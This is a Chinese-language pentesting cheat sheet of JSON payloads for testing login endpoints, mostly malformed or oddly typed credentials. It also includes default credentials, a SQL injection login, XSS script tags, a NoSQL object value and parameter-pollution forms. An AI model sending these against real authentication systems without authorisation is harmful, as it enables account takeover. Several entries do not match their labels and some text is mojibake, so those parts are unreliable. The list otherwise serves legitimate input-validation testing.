1. 基本凭证


{

"login": "admin",

"password": "admin"

}

  1. 空凭证:


{

"login": "",

"password": ""

}

3- 空值:


{

"login": null,

"password": null

}

  1. 数字作为凭证:


{

"login": 123,

"password": 456

}

  1. 布尔值作为凭证:


{

"login": true,

"password": false

}

  1. 数组作为凭证:

json身份认证渗透测试技巧 Json Attack


{

"login": ["admin"],

"password": ["password"]

}

  1. 对象作为凭证:


{

"login": {"username": "admin",

"password": {"password": "password"}}

}

  1. 凭证中的特殊字符:


{

"login": "@dm!n",

"password": "p@ssw0rd#"

}

  1. SQL注入:


{

"login": "admin' --",

"password": "password"

}

  1. 凭证中的 HTML 标签:


{

"login": "<h1>admin</h1>",

"password": "ololo-HTML-XSS"

}

  1. 凭证中的 Unicode:


{

"login": "\u0061\u0064\u006D\u0069\u006E",

"password":"\u0070\u0061\u0073\u0073\u0077\u006F\u0072\u0064"

}

  1. 带有转义字符的凭证:


{

"login": "ad\\nmin",

"password": "pa\\ssword"

}

  1. 带有空格的凭据:


{

"login": " ",

"password": " "

}

  1. 超长值:


{

"login": "a"*10000,

"password": "b"*10000

}

  1. JSON 格式错误(缺少大括号):


{

"login": "admin",

"password": "admin"

}

  1. 格式错误的 JSON(额外的逗号):


{

"login": "admin",

"password": "admin",

}

  1. 缺少登录密钥:


{

"password": "admin"

}

  1. 缺少密码密钥:


{

"login": "admin"

}

  1. 交换的键值:


{

"admin": "login",

"password": "password"

}

  1. 额外键值:


{

"login": "admin",

"password": "admin",

"extra": "extra"

}

  1. 缺少冒号:


{

"login" "admin",

"password": "password"

}

  1. 凭据中的无效布尔值:


{

"login": yes,

"password": no

}

  1. 所有键,无值:


{

"": "",

"": ""

}

  1. 嵌套对象:


{

"login": {"innerLogin": "admin",

"password": {"innerPassword": "password"}}

}

  1. 区分大小写测试:


{

"LOGIN": "admin",

"PASSWORD": "password"

}

  1. 登录为数字,密码为字符串:


{

"login": 1234,

"password": "password"

}

  1. 登录为字符串,密码为数字:


{

"login": "admin",

"password": 1234

}

  1. 重复键:


{

"login": "admin",

"login": "user",

"password": "password"

}

  1. 单引号而不是双引号:


{

'login': 'admin',

'password': 'password'

}

  1. 仅包含特殊字符的登录名和密码:


{

"login": "@#$%^&*",

"password": "!@#$%^&*"

}

  1. Unicode 转义序列:


{

"login": "\u0041\u0044\u004D\u0049\u004E",

"password":"\u0050\u0041\u0053\u0053\u0057\u004F\u0052\u0044"

}

  1. 值作为对象而不是字符串:


{

"login": {"$oid":

"507c7f79bcf86cd7994f6c0e"},

"password": "password"}

}

  1. 不存在的变量作为值:


{

"login": undefined,

"password": undefined

}

  1. 额外的嵌套对象:

json身份认证渗透测试技巧 Json Attack


{

"login": "admin",

"password": "password",

"extra": {"key1": "value1",

"key2": "value2"}

}

  1. 十六进制值:


{

"login": "0x1234",

"password": "0x5678"

}

  1. 有效 JSON 后的额外符号:


{

"login": "admin",

"password": "password"}@@@@@@

}

  1. 只有键,没有值:


{

"login":,

"password":

}

  1. 控制字符的插入:


{

"login": "ad\u0000min",

"password": "pass\u0000word"

}

  1. 长 Unicode 字符串:


{

"login": "\u0061"*10000,

"password": "\u0061"*10000

}

  1. 字符串中的换行符:


{

"login": "ad\nmin",

"password": "pa\nssword"

}

  1. 字符串中的制表符:


{

"login": "ad\tmin",

"password": "pa\tssword"

}

  1. 使用字符串中的 HTML 内容进行测试:


{

"login": "<b>admin",

"password": "password"

}

  1. 字符串中的 JSON 注入:


{

"login": "{\"injection\":\"value\"}",

"password": "password"

}

  1. 使用字符串中的 XML 内容进行测试:


{

"login": "admin",

"password": "password"

}

  1. 数字、字符串和特殊字符的组合:


{

"login": "ad123min!@",

"password": "pa55w0rd!@"

}

  1. 环境变量的使用:


{

"login": "${USER}",

"password": "${PASS}"

}

  1. 字符串中的反斜杠:


{

"login": "ad\\min",

"password": "pa\\ssword"

}

  1. 特殊字符长字符串:


{

"login": "!@#$%^&*()"*1000,

"password": "!@#$%^&*()"*1000

}

  1. JSON 中的空键:


{

"": "admin",

"password": "password"

}

  1. 键中的 JSON 注入:


{

"{\"injection\":\"value\"}

": "admin",

"password": "password"

}

  1. 字符串中的引号:


{

"login": "\"admin\"",

"password": "\"password\""

}

  1. 凭证作为嵌套数组:


{

"login": [["admin"]],

"password": [["password"]]

}

  1. 嵌套对象作为凭据:


{

"login": {"username": {"value": "admin",

"password": {"password": {"value":

"password"

}

  1. 键为数字:


{

123: "admin",

456: "password"

}

  1. 使用大于和小于符号进行测试:


{

"login": "admin>1",

"password": "<password"

}

  1. 在凭据中使用括号进行测试:


{

"login": "(admin)",

"password": "(password)"

}

  1. 包含斜杠的凭证:


{

"login": "admin/user",

"password": "pass/word"

}

  1. 包含多种数据类型的凭证:

json身份认证渗透测试技巧 Json Attack


{

"login": ["admin",

123,

true,

null,

{"username": ["admin"],

"password": ["password",

123,

false,

null,

{"password": "password"]}}

}

json身份认证渗透测试技巧 Json Attack

  1. 使用转义序列:


{

"login": "admin\\r\\n\\t",

"password": "password\\r\\n\\t"

}

  1. 在字符串中使用花括号:


{

"login": "{admin}",

"password": "{password}"

}

  1. 在字符串中使用方括号:


{

"login": "[admin]",

"password": "[password]"

}

  1. 仅包含特殊字符的字符串:


{

"login": "!@#$$%^&*()",

"password": "!@#$$%^&*()"

}

  1. 带有控制字符的字符串:


{

"login": "admin\b\f\n\r\t\v\0",

"password": "password\b\f\n\r\t\v\0"

}

  1. 字符串中的空字符:


{

"login": "admin\0",

"password": "password\0"

}

  1. 指数形式的数字作为字符串:


{

"login": "1e5",

"password": "1e10"

}

  1. 十六进制数字作为字符串:


{

"login": "0xabc",

"password": "0x123"

}

  1. 数字字符串中的前导零:


{

"login": "000123",

"password": "000456"

}

  1. 多语言输入(这里是英语和韩语):


{

"login": "admin관리ìž",

"password": "password비밀번호"

}

  1. 极长的键:


{

"a"*10000: "admin",

"b"*10000: "password"

}

  1. 极长的 unicode 字符串:


{

"login": "\u0061"*10000,

"password": "\u0062"*10000

}

  1. 带分号的 JSON 字符串:


{

"login": "admin;",

"password": "password;"

}

  1. 带反引号的 JSON 字符串:


{

"login": "`admin`",

"password": "`password`"

}

  1. 带加号的 JSON 字符串:


{

"login": "admin+",

"password": "password+"

}

  1. 带等号的 JSON 字符串:


{

"login": "admin=",

"password": "password="

}

  1. 带星号 (*) 符号的字符串:


{

"login": "admin*",

"password": "password*"

}

  1. 包含 JavaScript 代码的 JSON:


{

"login": "admin<script>alert('hi')</script>",

"password": "password"

}

  1. 负数作为字符串:


{

"login": "-123",

"password": "-456"

}

  1. URL 形式的值:


{

"login": "https://admin.com",

"password": "https://password.com"

}

  1. 电子邮件格式的字符串:


{

"login": "admin@admin.com",

"password": "password@password.com"

}

  1. IP 地址格式的字符串:


{

"login": "192.0.2.0",

"password": "203.0.113.0"

}

  1. 具有日期格式的字符串:


{

"login": "2023-08-03",

"password": "2023-08-04"

}

  1. 具有指数值的 JSON:


{

"login": 1e+30,

"password": 1e+30

}

  1. 具有负指数值的 JSON:


{

"login": -1e+30,

"password": -1e+30

}

  1. 在字符串中使用零宽度空格 (U+200B):


{

"login": "admin​",

"password": "password​"

}

  1. 在字符串中使用零宽度连接符 (U+200D):


{

"login": "adminâ€",

"password": "passwordâ€"

}

  1. 具有极大数字的 JSON:


{

"login": 12345678901234567890,

"password": 12345678901234567890

}

  1. 带有退格字符的字符串:


{

"login": "admin\b",

"password": "password\b"

}

  1. 使用字符串中的表情符号进行测试:


{

"login": "admin😀",

"password": "password😀"

}

  1. 带注释的 JSON,尽管 JSON 并未正式支持它们:


{

/*"login": "admin",

"password": "password"*/

}

  1. 具有 Base64 编码值的 JSON:


{

"login": "YWRtaW4=",

"password": "cGFzc3dvcmQ="

}

  1. 包括空字节字符(可能导致截断):


{

"login": "admin\0",

"password": "password\0"

}

  1. 带有科学计数法凭证的 JSON:

json身份认证渗透测试技巧 Json Attack


{

"login": 1e100,

"password": 1e100

}

  1. 具有八进制值的字符串:


{

"login": "\141\144\155\151\156",

"password":"\160\141\163\163\167\157\162\144"

}

  1. 其他


{

root:{

"username": "admin",

"password":"admin"

}

}

  1. 其他


basic => username=admin

username[]=admin

username[0]=admin

username=admin&username=admin

delete username=admin